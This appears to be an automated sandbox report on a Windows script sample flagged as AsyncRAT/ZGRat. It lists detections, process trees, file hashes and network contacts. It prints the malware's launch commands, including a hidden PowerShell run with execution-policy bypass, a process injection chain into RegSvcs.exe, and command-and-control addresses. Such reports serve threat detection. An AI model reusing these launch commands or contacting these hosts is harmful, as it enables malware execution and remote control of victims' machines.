Malware Analysis Report

2025-06-16 02:15

Sample ID 240123-pny8wsaahl
Target f4accddf3bacbc70b54763800af4d7f47a427edd249ba1066ffcadb1458c03db (1)
SHA256 f4accddf3bacbc70b54763800af4d7f47a427edd249ba1066ffcadb1458c03db
Tags
zgrat rat asyncrat default
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

f4accddf3bacbc70b54763800af4d7f47a427edd249ba1066ffcadb1458c03db

Threat Level: Known bad

The file f4accddf3bacbc70b54763800af4d7f47a427edd249ba1066ffcadb1458c03db (1) was found to be: Known bad.

Malicious Activity Summary

zgrat rat asyncrat default

AsyncRat

ZGRat

Detect ZGRat V1

Async RAT payload

Blocklisted process makes network request

Checks computer location settings

Suspicious use of SetThreadContext

Drops file in System32 directory

Enumerates physical storage devices

Uses Task Scheduler COM API

Suspicious use of AdjustPrivilegeToken

Suspicious use of SetWindowsHookEx

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-01-23 12:29

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-01-23 12:29

Reported

2024-01-23 12:31

Platform

win7-20231215-en

Max time kernel

145s

Max time network

122s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f4accddf3bacbc70b54763800af4d7f47a427edd249ba1066ffcadb1458c03db (1).wsf"

Signatures

Detect ZGRat V1

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

ZGRat

rat zgrat

Blocklisted process makes network request

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WScript.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Drops file in System32 directory

Description | Indicator | Process | Target
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f4accddf3bacbc70b54763800af4d7f47a427edd249ba1066ffcadb1458c03db (1).wsf"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe


C:\Windows\system32\taskeng.exe

taskeng.exe {B1F5D91D-0ECF-4114-BA10-3A0FC54202E9} S-1-5-21-928733405-3780110381-2966456290-1000:VTILVGXH\Admin:Interactive:[1]

C:\Windows\System32\WScript.exe

C:\Windows\System32\WScript.exe "C:\Users\Public\hich.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\hich.ps1'"

C:\Windows\System32\cmd.exe

cmd /c ""C:\Users\Public\hich.bat" "

Network

Country | Destination | Domain | Proto
FR | 185.81.157.103:80 | 185.81.157.103 | tcp
FR | 185.81.157.103:80 | 185.81.157.103 | tcp

Files

memory/2744-7-0x000000001B1C0000-0x000000001B4A2000-memory.dmp

memory/2744-9-0x000007FEF5D30000-0x000007FEF66CD000-memory.dmp

memory/2744-10-0x0000000002960000-0x00000000029E0000-memory.dmp

memory/2744-8-0x0000000002570000-0x0000000002578000-memory.dmp

memory/2744-11-0x000007FEF5D30000-0x000007FEF66CD000-memory.dmp

memory/2744-12-0x0000000002960000-0x00000000029E0000-memory.dmp

memory/2744-13-0x0000000002960000-0x00000000029E0000-memory.dmp

memory/2744-14-0x0000000002960000-0x00000000029E0000-memory.dmp

memory/2744-18-0x000007FEF5D30000-0x000007FEF66CD000-memory.dmp

C:\Users\Public\hich.vbs

MD5 741b5b0a474f0e0cd28fd880f68723c0
SHA1 4de5489c4e56882514b3ab432048200eae65f90d
SHA256 f7edde68b4f783fe07a6cb0d12ffc76b04a9d81747cff32eed06c7caee5f7b23
SHA512 3783759fc24189ddb02ab9bd9888f4fe458ed378c6079d3fbd28af6fc34200d5f45ccd7e1c4beca90d9afe9d3bb29f7f20128c7b0a958c2c8a1a1ce8e9cc2f54

C:\Users\Public\hich.bat

MD5 6c8a34a94e068b809145df09acbe153c
SHA1 0ec5c6964c6ccc949af47297eb9794f8f1ee4724
SHA256 c683e03275b7f8d2031a42bdde2b95e2f46e8811004205a092e87de4bae5d003
SHA512 41431bb242a1b5848b8c4ab197dc6181db6f203bb26de68f492b99e876b63b73c6497fb996b0341045b1babd1c92be3346de116fa3699017d58e1d1199bfd805

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 25af3af8f786943d78326df1a84fd5df
SHA1 331aa1b11635d06c4ab3e292139e134c3f907113
SHA256 6058dfc7bbbaac27a77299952669de5145c7a3277dcf3e46f8af4e4eac87f29a
SHA512 d32a51522562117700a735e1af0ae279528a3e668ee753cb1b45dfe9422a3bc184a9ba4c94c12dc78c73b8324d3b392f5e1e478cfec066333e4170f342f06f90

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\J8RF7N5OGWR5H3BR9IKQ.temp

MD5 ce37b88de003d46be6fb52b722efd721
SHA1 9817eb666450d67d8d1a96ba8d99b760132bc856
SHA256 a9f696a8992cbb6984933405c456d49c2e97adc9e98a2f8ee6e88f6a7f5a5fd1
SHA512 f93ee23a0ab7b0574fba19eced9e7d835627c09d0ee0bfab7f4239c2f4b53ad374de3498c282776082b551c30e09b82c56aaca574eea8c23e44b33d86aa56ada

memory/1316-28-0x000007FEF5DD0000-0x000007FEF676D000-memory.dmp

memory/1316-29-0x0000000002450000-0x00000000024D0000-memory.dmp

memory/1316-27-0x00000000025E0000-0x00000000025E8000-memory.dmp

memory/1316-26-0x000000001B200000-0x000000001B4E2000-memory.dmp

memory/1316-30-0x000007FEF5DD0000-0x000007FEF676D000-memory.dmp

memory/1316-33-0x0000000002450000-0x00000000024D0000-memory.dmp

memory/1316-32-0x0000000002450000-0x00000000024D0000-memory.dmp

C:\Users\Public\hich.ps1

MD5 b13a273e32d5763a07d712e5209055fa
SHA1 633dd0e5f647fee13536f74247159cdb07d72273
SHA256 2c9c01e49757fa9a9732a3e9a1f06fb785afe6f288382458d4e6bbf0adee3486
SHA512 8b50f49dfd641467b7c11363d221c790e99b41aa4fdd97befb8c7deb1516584774690ab2b9ee4be951d162d9a56d57586af1d49d39a6f6f97a8a3b1fbc432908

memory/1316-31-0x0000000002450000-0x00000000024D0000-memory.dmp

memory/1316-35-0x000000001B600000-0x000000001B634000-memory.dmp

memory/1316-36-0x0000000002450000-0x00000000024D0000-memory.dmp

memory/1316-37-0x000007FEF5DD0000-0x000007FEF676D000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-01-23 12:29

Reported

2024-01-23 12:31

Platform

win10v2004-20231215-en

Max time kernel

143s

Max time network

147s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f4accddf3bacbc70b54763800af4d7f47a427edd249ba1066ffcadb1458c03db (1).wsf"

Signatures

AsyncRat

rat asyncrat

Detect ZGRat V1

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

ZGRat

rat zgrat

Async RAT payload

rat

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Blocklisted process makes network request

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WScript.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Checks computer location settings

Description | Indicator | Process | Target
Key value queried | \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A
Key value queried | \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A

Suspicious use of SetThreadContext

Description | Indicator | Process | Target
PID 4216 set thread context of 1144 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | N/A

Suspicious use of SetWindowsHookEx

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 4728 wrote to memory of 3004 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4728 wrote to memory of 3004 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4564 wrote to memory of 2528 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\system32\cmd.exe
PID 4564 wrote to memory of 2528 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\system32\cmd.exe
PID 2528 wrote to memory of 4216 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2528 wrote to memory of 4216 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4216 wrote to memory of 2900 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 4216 wrote to memory of 2900 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 4216 wrote to memory of 2900 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 4216 wrote to memory of 1144 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 4216 wrote to memory of 1144 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 4216 wrote to memory of 1144 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 4216 wrote to memory of 1144 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 4216 wrote to memory of 1144 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 4216 wrote to memory of 1144 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 4216 wrote to memory of 1144 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 4216 wrote to memory of 1144 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f4accddf3bacbc70b54763800af4d7f47a427edd249ba1066ffcadb1458c03db (1).wsf"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe


C:\Windows\System32\WScript.exe

C:\Windows\System32\WScript.exe "C:\Users\Public\hich.vbs"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Public\hich.bat" "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\hich.ps1'"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

Network

Country | Destination | Domain | Proto
FR | 185.81.157.103:80 | 185.81.157.103 | tcp
US | 8.8.8.8:53 | 103.157.81.185.in-addr.arpa | udp
FR | 185.81.157.103:80 | 185.81.157.103 | tcp
US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp
US | 8.8.8.8:53 | 173.178.17.96.in-addr.arpa | udp
US | 8.8.8.8:53 | 84.177.190.20.in-addr.arpa | udp
US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp
US | 8.8.8.8:53 | 114.110.16.96.in-addr.arpa | udp
US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp
US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp
US | 8.8.8.8:53 | 217.135.221.88.in-addr.arpa | udp
US | 8.8.8.8:53 | 212.166.122.92.in-addr.arpa | udp
US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp
US | 8.8.8.8:53 | 187.178.17.96.in-addr.arpa | udp
FR | 185.81.157.183:9696 | | tcp
FR | 185.81.157.183:9696 | | tcp
US | 8.8.8.8:53 | 8.179.89.13.in-addr.arpa | udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_sfaqiojb.kai.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3004-8-0x000002C0AAF90000-0x000002C0AAFB2000-memory.dmp

memory/3004-13-0x00007FF844390000-0x00007FF844E51000-memory.dmp

memory/3004-14-0x000002C0C3430000-0x000002C0C3440000-memory.dmp

memory/3004-15-0x000002C0C3430000-0x000002C0C3440000-memory.dmp

memory/3004-19-0x000002C0C3430000-0x000002C0C3440000-memory.dmp

memory/3004-22-0x00007FF844390000-0x00007FF844E51000-memory.dmp

C:\Users\Public\hich.vbs

MD5 741b5b0a474f0e0cd28fd880f68723c0
SHA1 4de5489c4e56882514b3ab432048200eae65f90d
SHA256 f7edde68b4f783fe07a6cb0d12ffc76b04a9d81747cff32eed06c7caee5f7b23
SHA512 3783759fc24189ddb02ab9bd9888f4fe458ed378c6079d3fbd28af6fc34200d5f45ccd7e1c4beca90d9afe9d3bb29f7f20128c7b0a958c2c8a1a1ce8e9cc2f54

C:\Users\Public\hich.bat

MD5 6c8a34a94e068b809145df09acbe153c
SHA1 0ec5c6964c6ccc949af47297eb9794f8f1ee4724
SHA256 c683e03275b7f8d2031a42bdde2b95e2f46e8811004205a092e87de4bae5d003
SHA512 41431bb242a1b5848b8c4ab197dc6181db6f203bb26de68f492b99e876b63b73c6497fb996b0341045b1babd1c92be3346de116fa3699017d58e1d1199bfd805

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 2f57fde6b33e89a63cf0dfdd6e60a351
SHA1 445bf1b07223a04f8a159581a3d37d630273010f
SHA256 3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA512 42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

memory/4216-26-0x00007FF844390000-0x00007FF844E51000-memory.dmp

memory/4216-28-0x000001AAA3660000-0x000001AAA3670000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 b66db53846de4860ca72a3e59b38c544
SHA1 2202dc88e9cddea92df4f4e8d83930efd98c9c5a
SHA256 b1a00fcea37b39a5556eea46e50711f7713b72be077a73cb16515ca3538d6030
SHA512 72eff4ae1d541c4438d3cd85d2c1a8c933744b74c7a2a4830ffe398fee88f1a8c5b241d23e94bcdf43b4be28c2747b331a280a7dc67ab67d8e72c6569f016527

memory/4216-27-0x000001AAA3660000-0x000001AAA3670000-memory.dmp

C:\Users\Public\hich.ps1

MD5 8469f5b76df0f510fe02b1eab0f57226
SHA1 7ad6c79dc42aafd7b813353c8bdcb1204c376621
SHA256 a7247306f746e668360268472d038a8848d49645970ca7501d50cc0f700db279
SHA512 526280cb8cc15bae99a02c6f6a0ca26564f7eb657f610cd1579d953b584705b9bca8d0a7b6902e0bd0234912acdbb1b74bf4adf8aa7c6e49b6876b8ae82fe0b4

memory/4216-40-0x000001AAA3C40000-0x000001AAA3C74000-memory.dmp

memory/4216-41-0x000001AAA3660000-0x000001AAA3670000-memory.dmp

memory/1144-42-0x0000000000400000-0x0000000000416000-memory.dmp

memory/4216-44-0x00007FF844390000-0x00007FF844E51000-memory.dmp

memory/1144-45-0x0000000075250000-0x0000000075A00000-memory.dmp

memory/1144-46-0x00000000057E0000-0x00000000057F0000-memory.dmp

memory/1144-47-0x0000000005ED0000-0x0000000006474000-memory.dmp

memory/1144-48-0x0000000005B00000-0x0000000005B92000-memory.dmp

memory/1144-49-0x0000000005AF0000-0x0000000005AFA000-memory.dmp